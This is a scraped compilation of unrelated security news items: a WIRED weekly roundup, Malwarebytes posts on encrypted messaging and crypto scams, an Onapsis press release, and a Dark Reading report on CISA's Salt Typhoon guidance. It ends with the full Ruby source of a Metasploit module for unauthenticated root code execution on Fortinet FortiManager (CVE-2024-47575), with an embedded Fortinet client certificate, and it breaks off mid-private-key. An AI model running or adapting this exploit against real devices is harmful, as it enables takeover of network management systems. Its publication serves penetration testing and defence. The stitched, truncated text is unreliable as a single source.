Plus: Russian spies keep hijacking other hackers’ infrastructure, Hydra dark web market admin gets life sentence in Russia, and more of the week’s top security news.

A consortium of global law enforcement agencies led by Britain’s National Crime Agency announced a takedown operation this week against two major Russian money-laundering networks that process billions of dollars each year in more than 30 locations around the world. WIRED had exclusive access to the investigation, which uncovered new and troubling laundering techniques, particularly schemes to directly change cryptocurrency for cash. As the United States government scrambles to address China’s “Salt Typhoon” digital espionage campaign into US telecoms, two senators demanded this week that the Department of Defense investigate its failure to secure its own communications and address known vulnerabilities in US telecom infrastructure. Meanwhile, Signal Foundation president Meredith Whittaker spoke at WIRED’s The Big Interview event in San Francisco this week about Signal’s enduring commitment to bring private, end-to-end encrypted communication services to people all over the world regardless of geopolitical climate.

A new smartphone scanner from the mobile device security firm iVerify can quickly and easily detect spyware and has already flagged seven devices infected with the invasive Pegasus surveillance tool. Programmer Micah Lee built a tool to help you save and delete your X posts after he offended Elon Musk and was banned from the platform. And privacy advocate Nighat Dad is fighting to protect women from digital harassment in Pakistan after escaping from an abusive marriage.

The US Federal Trade Commission is targeting data brokers who it says unlawfully tracked protesters and US military personnel, but the enforcement efforts seem likely to trail off under the Trump administration. Similarly, the US Consumer Financial Protection Bureau has devised a strategy to impose new oversight on predatory data brokers, but the new administration may not continue the initiative. Some new laws are finally coming around the world in 2025 that will attempt to regulate the dysfunction of the digital advertising industry, but malicious advertising is still booming around the world and continues to play a big role in global scamming.

And there’s more. Each week, we round up the security and privacy news we didn’t cover in-depth ourselves. Click the headlines to read the full stories. And stay safe out there.

**US Officials Urge Americans to Encrypt Calls and Texts After Chinese Telecom Hacking**

Remember how the US federal government spent much of the last three decades periodically decrying the dangers of strong, freely available encryption tools, arguing that because they enable criminals and terrorists, they should be outlawed or required to implement government-approved backdoors? As of this week, the government will never again be able to make that argument without privacy advocates pointing to a particular phone call where two officials recommended Americans use exactly those encryption tools to protect themselves amidst an ongoing massive breach of US telecoms by Chinese hackers.

In a briefing with reporters about the breach of no fewer than eight phone companies by the Chinese state-sponsored espionage hackers known as Salt Typhoon, officials from the Cybersecurity and Infrastructure Security Agency (CISA) and the FBI both said that amid the still-uncontrolled infiltration of US telecoms that have exposed calls and texts, Americans should use encryption apps to safeguard their privacy. “Encryption is your friend, whether it’s on text messaging or if you have the capacity to use encrypted voice communication,” said Jeff Greene, CISA’s executive assistant director for cybersecurity. (Signal and WhatsApp, for instance, end-to-end encrypt calls and texts, though the officials didn’t name any particular apps.)

The recommendation amid what one senator has called “the worst telecom hack in our nation’s history” represents a stunning reversal from previous US officials’ rhetoric on encryption, and in particular the FBI’s repeated calls for access to backdoors in encryption. In fact, it was exactly this sort of government-approved wiretap capability requirement for US telecoms that the Salt Typhoon hackers in some cases exploited to access Americans communications.

**Russia’s FSB Hackers Keep Hijacking Other Hackers’ Infrastructure for Spying**

The hacker group known as Secret Blizzard, Snake, or Turla, widely believed to work for Russia’s FSB intelligence agency, is known for using some of the most ingenious hacking techniques ever seen to spy on its victims. One of the tricks that’s now become its signature move: hacking the infrastructure of other hackers to stealthily piggyback on their access. This week Microsoft’s threat intelligence researchers and security firm Lumen Technologies revealed that Turla gained access to the servers of a Pakistan-based hacker group and used its visibility into victim networks to spy on government, military and intelligence targets in India and Afghanistan of interest to the Kremlin. In some cases, Turla hijacked the Pakistani hackers’ access to install their own malware, while in other instances they appear to have used the other group’s tools for even greater stealth and deniability. The incident marks the fourth known time since 2017, when it penetrated an Iranian hacker group’s command-and-control servers, that Turla has freeloaded on another hacker group’s infrastructure and tooling, according to Lumen.

**Admin of Russian Dark Web Market Hydra Sentenced to Life in Prison**

The Russian government is known for turning a blind eye to cybercrime—until it doesn’t. This week 15 convicted members of the notorious dark web market Hydra learned the limits of that forbearance when they reportedly received prison sentences ranging from 8 years to 23 years, as well an unprecedented life sentence for the site’s creator Stanislav Moiseyev. Before it was taken down two years ago in a law enforcement operation led by IRS criminal investigators in the US and Germany’s BKA police agency, Hydra was a uniquely sprawling dark web marketplace, one that not only served as the post-Soviet world’s biggest online bazaar for narcotics but also a vast money laundering machine for crimes including ransomware, scams, and sanctions evasion. In total, Hydra enabled more than $5 billion dollars in dirty cryptocurrency transactions since 2015, according to crypto tracing firm Elliptic.

**Suspected Ransomware Actor “Wazawaka” Reportedly Charged and Apprehended by Russia**

Russian law enforcement charged and arrested a software developer last week who is suspected of prolific contributions to multiple ransomware groups, including building malware to extort money from businesses and other targets. The suspect is reportedly Mikhail Matveev, or “Wazawaka,” who has worked as an affiliate with ransomware gangs like Conti, LockBit, Babuk, DarkSide, and Hive. Social media reports indicate that Matveev confirmed his indictment and said that he has been released from law enforcement custody on bail.

Russia’s prosecutor general did not name Matveev, but described charges last week against a 32-year-old hacker under Article 273 of Russia’s Criminal Code, which bans the creation or use of malware. The move came as Russia seemed to be sending some sort of message about its tolerance for cybercrime with the sentencing of the dark web marketplace Hydra’s staff, including a life sentence for its administrator. In 2023, the US government indicted and sanctioned Matveev.

**FBI Is Investigating Exxon Lobbyist Firm Over Hack-and-Leak Operation Targeting Activists**

In a disturbing scoop (one we didn’t cover last week due to the Thanksgiving holiday), Reuters reporters have revealed that the FBI is now investigating a lobbying consultancy hired by Exxon over the firm’s role in a hack-and-leak operation that targeted climate change activists. DCI Group, a lobbying firm hired at the time by Exxon, allegedly gave a list of target activists to a private investigator who then outsourced a hacking operation against those targets to mercenary hackers. After the private investigator—an Israeli man named Amit Forlit, who was later arrested in London and faces US hacking charges—allegedly gave the hacked material to DCI, it leaked the activists’ internal communications about climate change litigation against Exxon to the media, Reuters discovered. The FBI, according to Reuters, has determined that DCI also first previewed that material to Exxon before leaking it. “Those documents were directly employed by Exxon to come after me with all guns blazing,” one attorney working with the activist group, the Center for Climate Integrity, told Reuters. “It turned my life upside down.”

Exxon has denied knowing about any hacking activities and DCI told Reuters in a statement that “we direct all our employees and consultants to comply with the law.”

US Officials Recommend Encryption Apps Amid Chinese Telecom Hacking

US telecom providers have been infiltrated to a worrying level by an APT group. The advice is to use encrypted messaging.

A years-long infiltration into the systems of eight telecom giants, including AT&T and Verizon, allowed a state sponsored actor to steal vast amounts of data on where, when and who individuals have been communicating with.

Speaking to Reuters, a senior US official said the attack telecommunications infrastructure was broad and that the hacking was still ongoing.

The state-sponsored actor behind the attack is an Advanced Persistent Threat (APT) group known as Salt Typhoon, believed to be tied to the People’s Republic of China (PRC).

Sophisticated state-sponsored campaigns from China are constantly targeting network appliances and devices. Among the culprits are four major APT groups: Volt Typhoon, Salt Typhoon, Flax Typhoon, and Velvet Ant. Volt Typhoon made headlines earlier this year when the FBI removed their malware from hundreds of routers across the US.

The infrastructure that the US government relies to communicate on is made up of the same private sector systems that everybody else uses. By abusing their components that make up part of the infrastructure, the Chinese are said to have been able to eavesdrop on political and industrial leaders in multiple countries.

Speaking to Reuters, the official said they believed a “large number” of American’s metadata was taken. When asked if that might include every Americans’ phone records, they said:

> “We do not believe it’s every cell phone in the country, but we believe it’s potentially a large number of individuals that the Chinese government was focused on.”

The Cybersecurity and Infrastructure Security Agency (CISA) and the FBI have been investigating the incident since late spring, but admitted that there are still many unanswered questions, including the extent of the breach itself.

They have been working with the telecom companies to remove the intruders, but the companies have not been able to fully remove the hackers from their systems.

Anne Neuberger, the US deputy national security adviser for cyber and emerging technologies stated the “Chinese access was broad in terms of potential access to communications of everyday Americans” but she said the hackers only targeted prominent individuals.

According to NBC news, two officials — a senior FBI official who asked not to be named and Jeff Greene, executive assistant director for cybersecurity at CISA– both recommended using encrypted messaging apps to Americans who want to minimize the chances of China’s intercepting their communications.

If you plan to follow that advice, but are new to encrypted messaging, make sure to use an app that offers E2EE (End-to-end encryption). What that means is only the person sending it and the person receiving it can read it.

To achieve this, a message gets encrypted on your device before it is sent out. During transit the message remains encrypted the entire time it is moving across the internet.  Only when the message reaches the recipient’s device can it be decrypted and read.

You don’t need an expensive app to achieve this. Several popular messaging apps and services support end-to-end encryption, such as WhatsApp, Signal, iMessage, Wire, and Telegram.

The FBI official added:

> “People looking to further protect their mobile device communications would benefit from considering using a cellphone that automatically receives timely operating system updates, responsibly managed encryption and phishing resistant multi-factor authentication for email, social media, and collaboration tool accounts.”

**We don’t just report on threats – we help protect your social media**

Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Malwarebytes Identity Theft Protection.

 Americans urged to use encrypted messaging after large, ongoing cyberattack 

PRESS RELEASE

BOSTON, MA -- December 4, 2024 – Onapsis, the global leader in SAP cybersecurity and compliance, today announced the expansion of its Control product line to include a new bundle that enhances application security testing capabilities for SAP Business Technology Platform (BTP). The new offering supports both new and existing customers by enabling seamless, automated code scanning in SAP’s most commonly used integrated development environments (IDEs) and Git repositories.  This helps teams accelerate development, automate manual effort, enhance security and mitigate risks in their RISE with SAP and SAP BTP projects.

As SAP continues to drive cloud adoption for its SAP S/4HANA ecosystem, organizations are increasingly turning to SAP BTP for custom application development. However, as these projects scale, ensuring the security and integrity of the code is more important than ever. The expanded capabilities of the Control for BTP bundle address this challenge by providing development and quality assurance teams with comprehensive application security testing support, embedded directly into their development workflows.

Key features of the new offering include:

*   Code Scanning Across SAP Recommended IDEs for BTP: Control now supports SAP’s most frequently used IDEs, including SAP Business Application Studio (SAP BAS), Visual Studio Code and Eclipse with ABAP Development Tools. This capability ensures that developers working in RISE with SAP or SAP BTP environments can scan their code for issues and vulnerabilities within the IDEs they already use on a day to day basis.
    

*   Inline Security “Spell Check” for Developers: To help developers accelerate and de-risk projects, Control for BTP offers real-time, inline security scanning while code is being written. Just like a spell checker in a word processor, the product identifies code issues as they occur, providing developers with immediate feedback and actionable fixes to address security risks during the development process. 
    

*   Centralized Git Repository Scanning: As SAP development increasingly moves toward Git-based workflows, Control for BTP allows developers to centrally manage code security scans. Whether performing individual scans or bulk scans across multiple Gits, developers can quickly and efficiently scan entire code projects by simply pointing the product to the relevant Git repositories, saving time and reducing manual efforts.
    

“We’re excited to be the first to market with this comprehensive application security solution for SAP BTP,” said Sadik Al-Abdulla, Chief Product Officer of Onapsis. “SAP’s fiscal Q3 cloud revenue is up 25%, demonstrating growing adoption of its cloud services for SAP S/4HANA as companies look to update and modernize their legacy SAP ECC landscapes. As such, securing code throughout the software development lifecycle has never been more critical. With our expanded code security testing capabilities for BTP, we’re empowering developers to proactively find and fix vulnerabilities, ensuring faster, safer and more successful RISE with SAP projects.”

Onapsis is the only application security and compliance vendor endorsed by SAP. With the extension of BTP support to Control, Onapsis now offers customers comprehensive security and compliance coverage for SAP BTP across all of its key product lines - Assess, Defend and Control.

SAP BTP is a cornerstone of SAP’s CleanCore approach, designed to minimize customizations and simplify system upgrades. Onapsis’ new offering provides peace of mind by ensuring that code developed for SAP BTP is free from vulnerabilities that could lead to compliance issues, production failures, unplanned downtime or project delays.

Onapsis has been recognized in the Gartner® Magic Quadrant™ for Application Security Testing for three consecutive years.

Availability

The expanded SAP BTP security offering is generally available in Q4 2024, with pricing and further details available through Onapsis sales representatives or authorized systems integrators. For more information, please visit: https://onapsis.com/platform/btp/.   

Gartner, Magic Quadrant for Application Security Testing, by Mark Horvath, Dale Gardner, Manjunath Bhat, Ravisha Chugh, Angela Zhao, 30 April 2024 

Gartner is a registered trademark and service mark, and Magic Quadrant is a registered trademark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved. 

Gartner does not endorse any vendor, product or service depicted in its research publications and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

About Onapsis

Onapsis is the global leader in SAP cybersecurity and compliance, trusted by the world’s leading organizations to securely accelerate their SAP cloud digital transformations with confidence. As the SAP-endorsed and most widely used solution to protect SAP, the Onapsis Platform empowers Cybersecurity and SAP teams with automated compliance, vulnerability management, threat detection, and secure development for their RISE with SAP, S/4HANA Cloud and hybrid SAP applications. Powered by threat insights from the Onapsis Research Labs, the world’s leading SAP cybersecurity experts, Onapsis provides unparalleled protection, ease of use, and rapid time to value, empowering SAP customers to innovate faster and securely. Connect with Onapsis on LinkedIn, X, or visit https://www.onapsis.com.

Onapsis Expands Code Security Capabilities to Accelerate and De-Risk SAP BTP Development Projects

Individuals concerned about the privacy of their communications should consider using encrypted messaging apps and encrypted voice communications, CISA and FBI officials say.

Source: Weitwinkel via Shtterstock

Concerns over the extent of China-backed Salt Typhoon's intrusions into US telecom networks have prompted the US Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and the FBI to issue guidance to the sector on addressing the threat.

The detailed recommendations come as officials from the authoring agencies this week described victims of the attack — which include Verizon, AT&T, and Lumen — as still working to eradicate the threat actor from their networks.

**Still Working to Evict**

"We cannot say with certainty that the adversary has been evicted, because we still don't know the scope of what they're doing," Jeff Greene, executive assistant director for cybersecurity at CISA, said in a media call this week.

"I have confidence that we are on top of it in terms of tracking them down and seeing what's going on, but we cannot, with confidence, say that we know everything," Greene said, according to a transcript of the media call that CISA made available to Dark Reading. Given where most victims are in their investigations, it is "impossible" to predict a timeframe for when they will complete fully evicting the threat actor, he said.

Several security experts consider Salt Typhoon's attacks on US telecom infrastructure as one of the most egregious cyber espionage campaigns ever in size and scope. It's unknown how many companies the threat actor has compromised as part of the campaign so far, but known victims include some of the biggest telecom providers in the country, including AT&T and Verizon.

The attacks enabled multiple activities, including theft of a large number of call detail records — such as a caller's and receiver's phone numbers, call duration, call type, and cell tower location — of telecom customers. In a smaller number of instances, Salt Typhoon used its presence on telecom provider networks to intercept calls and messages of targeted individuals, which include government officials and politicians. Separately, the threat actor also collected information on an unknown number of individuals who were the subjects of legal national security and law enforcement intercepts.

"The continued investigation into the PRC targeting commercial telecom infrastructure has revealed a broad and significant cyber-espionage campaign," an FBI official said on background during this week's media call. "We have identified that PRC-affiliated cyber actors have compromised networks of multiple telecom companies to enable multiple activities.

**Detailed Recommendations**

The new guidance for addressing the threat includes recommendations for quickly detecting Salt Typhoon activity, improving visibility, reducing existing vulnerabilities, eliminating common misconfigurations, and limiting the attack surface. The guidelines include a section devoted to hardening Cisco network gear, which the authoring agencies described as a popular target for the attacker in the ongoing campaign.

"Right now, the hardening guidance that we put out specifically would make the activities that we've seen across the victims much harder to continue," Greene said. "In some cases, it might result in limiting their access." He described Salt Typhoon actors as employing a variety of tactics to breach victim networks, so response and mitigation approaches will differ on a case by case basis. "These are not cookie-cutter compromises in terms of how deeply compromised a victim might be, or what the actor has been able to do."

**Use Encrypted Messaging Apps and Services**

Green and the FBI official on the media call recommended that individuals concerned about the privacy of their mobile device communications should consider using encrypted messaging apps — examples of which would include WhatsApp and Signal — and encrypted voice communications. "People looking to further protect their mobile device communications would benefit from considering using a cellphone that automatically receives timely operating system updates, responsibly managed encryption, and phishing resistant MFA for email, social media, and collaboration tools," the FBI official said.

Trey Ford, chief information security officer (CISO) at Bugcrowd pointed to phishing-resistant multifactor authentication in the new guidance as something that organizations should consider prioritizing. "Everything we can do to raise the cost and work factor for malicious actors and nation state communities helps," he notes. He also recommends that organizations add encryption to all traffic crossing third-party communications infrastructure and leverage apps like WhatsApp and Signal where it makes sense. "Also, I would recommend adding a second factor of authentication, something stronger than SMS, such as Yubikeys, Apple's Secure Element, or pseudo-random code generators like Google Authenticator, Authy, \[and\] Duo, to all of your online accounts."

Chris Pierson, CEO and founder of Blackcloak, perceives the new hardening advice as useful in helping companies in the telecom sector prioritize their controls, remediation, and ongoing assessment activity. The advice to individual consumers and business executives to protect against Salt Typhoon is useful as well, he notes: "From tips on using security messaging as opposed to text/SMS, reducing the likelihood of SIM swapping by using a SIM PIN, and implementing dual factor authentication on key accounts, the guidance makes it easier for key executives and highly targeted persons to protect themselves."

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

CISA Issues Guidance to Telecom Sector on Salt Typhoon Threat

The value of cryptocurrencies is going through the roof, so the scammers are even more interested in your funds

With the value of cryptocurrencies going to the roof, you can expect several attempts to get defrauded if you even show the slightest interest in the topic or not.

Since most cybercriminals lack creativity and are notoriously lazy, we expect to see only slight variations of old tricks. So, we figured if we showed you some old examples, you would know what to expect and hopefully that will assist you in avoiding them. And avoiding them is in everyone’s best interest—the Federal Bureau of Investigation (FBI) reported estimated losses to cryptocurrency related fraud exceeding $5.6 billion in 2023.

Here’s what to look out for:

**Pig butchering scams**. We have discussed the workings of pig butchering scams several times. Somebody contacts you out of the blue, sometimes pretending to be a friend you haven’t heard of in ages, sometimes a celebrity, and sometimes someone appearing to have the wrong contact details.

Once the conversation starts, the scammer will slowly move to the subject of interesting “investments” with the goal of cleaning out your accounts. The investments, mind you, are always part of the larger scam. By siphoning your money out of your accounts, and by sometimes even fabricating false “returns” on your investments, the cybercriminals are slowly building trust from you, only to yank away all your money at a later date.

**Elon Musk livestreams.** Scammers have used deepfake videos of Elon Musk and other wealthy celebrities to deceive investors. These scams make it appear as if this celebrity is discussing specific cryptocurrency opportunities and promising doubled returns on cryptocurrency deposits if victims send in their crypto. Remember, if a celebrity or public figure is suddenly making large promises on specific, individual cryptocurrencies, be cautious about their claims.

**Fake crypto trading platforms.** If you want to invest in cryptocurrency or want to get out now that the price is right for you, be careful where you conduct the trades. Unfortunately, we have seen a number of devastating exit scams and other deceptive operations where people’s life savings disappeared into thin air.

**Advance fee scams.** These are closely related to the fake crypto trading platform. In advance fee scams a “trader” asks for an upfront payment, promising a future service or huge return on investment. This is sometimes followed by additional requests to complete the promised transaction, which, as it turns out eventually, will never happen.

**Fake bonus scams.** Similar to pyramid schemes, there are sites where users would supposedly earn more based on the number of referrals and investment amounts made by their referrals. The victims did indeed see the number of tokens grow steadily. But when they tried to withdraw their funds, they got nothing.

**Compromised account scams**. Cybercriminals will send a warning to the target and claim that their account has been compromised. If the user responds, the scammers will try to obtain additional information such as the owner’s seed phrase, an important piece of information which thieves can use to empty the account.

**Typosquatting.** Similar to other typosquatting scams, imposters have registered domain names that are similar to or can easily be confused with legitimate cryptocurrency trading platforms. Should you enter your login credentials on such a fake site, the scammers will harvest them and log in on the actual site to take over your account.

**How to protect your investments**

A good resource for learning about crypto related scams is the Crypto Scam Tracker website of the California Department of Financial Protection and Innovation (DFPI) where you can find examples of the latest scams that are doing the rounds. Here is how you can stay safe from crypto scams (and other types of common scams found online):

*   Use a password manager, it will refuse to fill out your details when it’s on the wrong website.
*   Use multi-factor authentication (MFA) to make it harder for criminals to take over your account.
*   Don’t respond to messages out of the blue, especially from people you don’t know.
*   Don’t click on links in unsolicited emails or messages.
*   Carefully research the platforms you plan to do business with.

And always act on the age-old adage: “If it’s too good to be true, it probably is.”

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Crypto&#8217;s rising value likely to bring new wave of scams 

This Metasploit module exploits a missing authentication vulnerability affecting FortiManager and FortiManager Cloud devices to achieve unauthenticated RCE with root privileges. The vulnerable FortiManager versions are 7.6.0, 7.4.0 through 7.4.4, 7.2.0 through 7.2.7, 7.0.0 through 7.0.12, 6.4.0 through 6.4.14, and 6.2.0 through 6.2.12. The vulnerable FortiManager Cloud versions are 7.4.1 through 7.4.4, 7.2.1 through 7.2.7, 7.0.1 through 7.0.12, and 6.4 (all versions).

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::Tcp  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Fortinet FortiManager Unauthenticated RCE',        'Description' => %q{          This module exploits a missing authentication vulnerability affecting FortiManager and FortiManager          Cloud devices to achieve unauthenticated RCE with root privileges.          The vulnerable FortiManager versions are:          * 7.6.0          * 7.4.0 through 7.4.4          * 7.2.0 through 7.2.7          * 7.0.0 through 7.0.12          * 6.4.0 through 6.4.14          * 6.2.0 through 6.2.12          The vulnerable FortiManager Cloud versions are:          * 7.4.1 through 7.4.4          * 7.2.1 through 7.2.7          * 7.0.1 through 7.0.12          * 6.4 (all versions).        },        'License' => MSF_LICENSE,        'Author' => [          'sfewer-r7', # MSF Exploit & Rapid7 Analysis        ],        'References' => [          ['CVE', '2024-47575'],          # AttackerKB Rapid7 Analysis.          ['URL', 'https://attackerkb.com/topics/OFBGprmpIE/cve-2024-47575/rapid7-analysis'],          # Bishop Fox details certificate requirements for connecting to the FGFM service.          ['URL', 'https://bishopfox.com/blog/a-look-at-fortijump-cve-2024-47575'],          # Vendor Advisory.          ['URL', 'https://fortiguard.fortinet.com/psirt/FG-IR-24-423']        ],        'DisclosureDate' => '2024-10-23',        'Platform' => %w[unix linux],        'Arch' => [ARCH_CMD],        'Privileged' => true, # Code execution as 'root'        'DefaultOptions' => {          'RPORT' => 541,          'SSL' => true,          'FETCH_WRITABLE_DIR' => '/tmp'        },        'Targets' => [ [ 'Default', {} ] ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        # The exploit provides a suitable client certificate/key pair by default, however we can let a user configure        # a different certificate/key pair to use if they want. The user can also override the serial number and        # platform if needed, but the exploit will try to detect the serial number and platform from the certificate        # by default.        OptPath.new('ClientCert', [false, 'A file path to an x509 cert, signed by Fortinet, with a serial number in the CN']),        OptPath.new('ClientKey', [false, 'A file path to the corresponding private key for the ClientCert.']),        OptString.new('ClientSerialNumber', [false, 'If set, use this serial number instead of extracting one from the ClientCert.']),        OptString.new('ClientPlatform', [false, 'If set, use this platform instead of determining the platform at runtime.'])      ]    )  end  def check    fgfm_sock = make_socket    peer_cert = OpenSSL::X509::Certificate.new(fgfm_sock.peer_cert)    fgfm_sock.close    organization = get_cert_subject_item(peer_cert, 'O')    common_name = get_cert_subject_item(peer_cert, 'CN')    # Detect that the target is a Fortinet FortiManager, by inspecting the certificate the server is using.    # We look for an organization (O) of 'Fortinet', and a common name (CN) that starts with a FortiManager serial    # number identifier.    return CheckCode::Detected('Detected Fortinet FortiManager') if organization == 'Fortinet' && common_name&.start_with?('FMG')    CheckCode::Unknown  end  def exploit    client_cert_raw = datastore['ClientCert'] ? File.binread(datastore['ClientCert']) : get_client_cert    client_cert = OpenSSL::X509::Certificate.new(client_cert_raw)    common_name = get_cert_subject_item(client_cert, 'CN')    fail_with(Failure::BadConfig, 'No common name in client certificate subject') unless common_name    print_status("Client certificate common name: #{common_name}")    serial_number = 'FMG-VM0000000000'    platform = 'FortiManager-VM64'    # The platform needs to be the expected type of the corresponding serial number. We try to match these up here,    # and we allow for the automatic detection to be overridden by the ClientSerialNumber and ClientPlatform options    # in case it is needed.    if common_name.start_with? 'FMG'      serial_number = common_name      platform = 'FortiManager-VM64'    elsif common_name.start_with? 'FG'      serial_number = common_name      platform = 'FortiGate-VM64'    else      print_warning('Client certificate does not include a serial number in the common name. The target must be configured to accept a certificate like this.')    end    serial_number = datastore['ClientSerialNumber'] if datastore['ClientSerialNumber']    platform = datastore['ClientPlatform'] if datastore['ClientPlatform']    print_status("Using client serial number '#{serial_number}' and platform '#{platform}'.")    print_status('Connecting...')    fgfm_sock = make_socket    fail_with(Failure::UnexpectedReply, 'Connection failed.') unless fgfm_sock    print_status('Registering device...')    req1 = "get auth\r\nserialno=#{serial_number}\r\nplatform=#{platform}\r\nhostname=localhost\r\n\r\n\x00"    resp1 = send_packet(fgfm_sock, req1)    unless resp1&.include?('reply 200')      fail_with(Failure::UnexpectedReply, 'Request 1 failed: No reply 200.')    end    print_status('Creating channel...')    req2 = "get connect_tcp\r\ntcp_port=rsh\r\nchan_window_sz=#{32 * 1024}\r\nterminal=1\r\ncmd=/bin/sh\r\nlocalid=0\r\n\r\n\x00"    resp2 = send_packet(fgfm_sock, req2)    unless resp2&.include?('action=ack')      fail_with(Failure::UnexpectedReply, 'Request 2 failed: No ack.')    end    localid = resp2.match(/localid=(\d+)/)    unless localid      fail_with(Failure::UnexpectedReply, 'Request 2 failed: No localid found.')    end    print_status('Triggering...')    req3 = "channel\r\nremoteid=#{localid[1]}\r\n\r\n\x00" + payload.encoded.length.to_s + "\n" + payload.encoded + "0\n"    send_packet(fgfm_sock, req3, read: false)  end  # We create a TCP socket like this as we want to control how we specify the client certificate/key pair, which may  # either be a file path, or a blob of text.  def make_socket    hash = {      'Proto' => 'tcp',      'PeerHost' => datastore['RHOST'],      'PeerPort' => datastore['RPORT'],      'SSL' => true,      'SSLVerifyMode' => 'NONE',      'Context' =>        {          'Msf' => framework,          'MsfExploit' => self        }    }    hash['SSLClientCert'] = datastore['ClientCert'] if datastore['ClientCert']    hash['SSLClientKey'] = datastore['ClientKey'] if datastore['ClientKey']    params = Rex::Socket::Parameters.from_hash(hash)    params.ssl_client_cert = get_client_cert unless datastore['ClientCert']    params.ssl_client_key = get_client_key unless datastore['ClientKey']    fgfm_sock = Rex::Socket::Tcp.create_param(params)    # Register our new socket, so that abort_sockets will close this socket after the payload handler    # has caught the session (or until WfSDelay timesout). This avoids us having to introduce a separate timeout    # in the exploit method, before we manually close the socket and then try to catch the session. We want to keep    # the socket open until we have a session, as closing the socket too quickly can prevent the payload command    # we transmit over the FGFM channel on this socket from executing.    add_socket(fgfm_sock)    fgfm_sock  end  def send_packet(fgfm_sock, data, read: true)    packet = [0x36E01100, data.length + 8].pack('NN')    packet += data    fgfm_sock.write(packet)    return nil unless read    header = fgfm_sock.read(8)    unless header      print_error('Failed to read an FGFM header')      return nil    end    magic, len = header.unpack('NN')    unless magic == 0x36E01100      print_error('Bad magic value in FGFM header')      return nil    end    unless len >= 8      print_error('Bad length value in FGFM header')      return nil    end    fgfm_sock.read(len - 8)  end  def get_cert_subject_item(cert, type)    cert.subject.to_a.each do |item|      return item[1] if item[0] == type    end    nil  end=beginAn x509 certificate from an unregistered FortiManager trial VM, located at /etc/cert/local/ on the device, with aserial number of FMG-VM0000000000 and a platform of FortiManager-VM64.$ sha1sum Fortinet_Local2.cer9fad50dace25e68694e028f628282b1194ec58a1  Fortinet_Local2.cer$ sha1sum Fortinet_Local2.keyd006e298df00450973e22c74726404d841db9874  Fortinet_Local2.key$ openssl x509 -noout -text -in Fortinet_Local2.cerCertificate:    Data:        Version: 3 (0x2)        Serial Number: 405822 (0x6313e)        Signature Algorithm: sha256WithRSAEncryption        Issuer: C = US, ST = California, L = Sunnyvale, O = Fortinet, OU = Certificate Authority, CN = support, emailAddress = support@fortinet.com        Validity            Not Before: Nov 10 21:14:26 2017 GMT            Not After : Jan 19 03:14:07 2038 GMT        Subject: C = US, ST = California, L = Sunnyvale, O = Fortinet, OU = FortiManager, CN = FMG-VM0000000000, emailAddress = support@fortinet.com=end  def get_client_cert    "-----BEGIN CERTIFICATE-----MIIDzDCCArSgAwIBAgIDBjE+MA0GCSqGSIb3DQEBCwUAMIGgMQswCQYDVQQGEwJVUzETMBEGA1UECBMKQ2FsaWZvcm5pYTESMBAGA1UEBxMJU3Vubnl2YWxlMREwDwYDVQQKEwhGb3J0aW5ldDEeMBwGA1UECxMVQ2VydGlmaWNhdGUgQXV0aG9yaXR5MRAwDgYDVQQDEwdzdXBwb3J0MSMwIQYJKoZIhvcNAQkBFhRzdXBwb3J0QGZvcnRpbmV0LmNvbTAeFw0xNzExMTAyMTE0MjZaFw0zODAxMTkwMzE0MDdaMIGgMQswCQYDVQQGEwJVUzETMBEGA1UECBMKQ2FsaWZvcm5pYTESMBAGA1UEBxMJU3Vubnl2YWxlMREwDwYDVQQKEwhGb3J0aW5ldDEVMBMGA1UECxMMRm9ydGlNYW5hZ2VyMRkwFwYDVQQDExBGTUctVk0wMDAwMDAwMDAwMSMwIQYJKoZIhvcNAQkBFhRzdXBwb3J0QGZvcnRpbmV0LmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMcgGzRlTTeVjIcE8D7z7Vnp6LKDcGE57VL4qs1fOxvTrK2j7vWbVMHSsOpf8taAAm55qmqeS//woCJQq3t5mmq1M6MHm2nom6Q+dObcsfhieLrIFwp9X1Xt9YHKQd5qOR5PysrMhFKdpwMJfmlzuWWcIUeilgecP6eq9GS50gu4m+0NK0d3LTsmWz1jLNC3k74fYwYDsaPnhl/tsxcqZWrYHUHJhH5ep8YAxE6Eo2JG67BXOI/JbxrWPEh+zRLqA7ZrWeBPl0AEIXTK+SIBJTW0dpnxEcG6wBQQxCp8jZ+RlaFpKjBdYucDVTDtkLabvetOrAn+mjcRutg6NHlptSECAwEAAaMNMAswCQYDVR0TBAIwADANBgkqhkiG9w0BAQsFAAOCAQEAl265IvoXNxpTJEWdYwYvjAFdaueBk349ApvriQmsPdAJmhFgF4U8l6PI/kBPVYCgzP0EA1zImHwLFkzlCVtMtzhuUY3h2ZIUEhYwX0xEf5Kay2XHicWAwugQ0k/QDmivw7/w7UTiwPaMLroEcjRbH8T4TLCXBdKsgXYW+t72CSA8MJDSug8o2yABom6XKlXl35mD93BrFkbxhhAiCrrC63byX7XTuXTyrP1dO9Qi9aSPWrIbi2SV+SjTLhP0n1bdikVOHNNreyhQRlRjguPrW0P2Xqjbecgp98tdRyoOSr9sF5Qo5TKdvIwUFClFgsy+7pactwTnQmwhvlLQ7Z/dOg==-----END CERTIFICATE-----"  end  def get_client_key    "-----BEGIN PRIVATE 